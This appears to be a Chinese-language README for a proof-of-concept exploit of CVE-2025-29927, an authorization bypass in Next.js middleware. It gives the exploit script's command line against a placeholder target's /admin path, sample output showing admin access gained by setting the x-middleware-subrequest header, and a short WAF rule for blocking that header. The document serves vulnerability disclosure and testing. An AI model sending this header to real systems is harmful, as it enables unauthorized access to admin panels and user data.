本仓库包含针对 CVE-2025-29927 的 PoC(概念验证)漏洞利用代码,这是 Next.js 中的一个关键漏洞,攻击者可利用中间件特有的 HTTP 标头绕过授权检查。
Next.js 应用通常依赖中间件进行授权和访问控制。该 CVE 源于 x-middleware-subrequest 标头在处理过程中的逻辑缺陷。当此标头被设置为 middleware 时,服务器可能错误地认为请求来自内部逻辑,从而绕过基于中间件的认证。
攻击者可借此在无需任何凭据或有效会话的情况下,访问管理后台、受保护的 API 或用户数据。
我们提供了一个简单的 Python 脚本,用于测试 Next.js 应用是否存在该漏洞。
python3 exploit.py --url https://target.com --path /admin [--proxy http://127.0.0.1:8080]
[+] Sending request to: https://target.com/admin
[+] Using header: x-middleware-subrequest: middleware
[+] Status Code: 200
[+] Response Body (first 500 chars):
<!DOCTYPE html><html><head>...You are logged in as admin...
WAF 逻辑:
if header 'x-middleware-subrequest' == 'middleware':
block_request()
该 PoC 由 W2H Corp. 的 Offensive Security Team 开发,是我们持续漏洞研究工作的一部分。关于该 CVE 的原始解释文章见此处。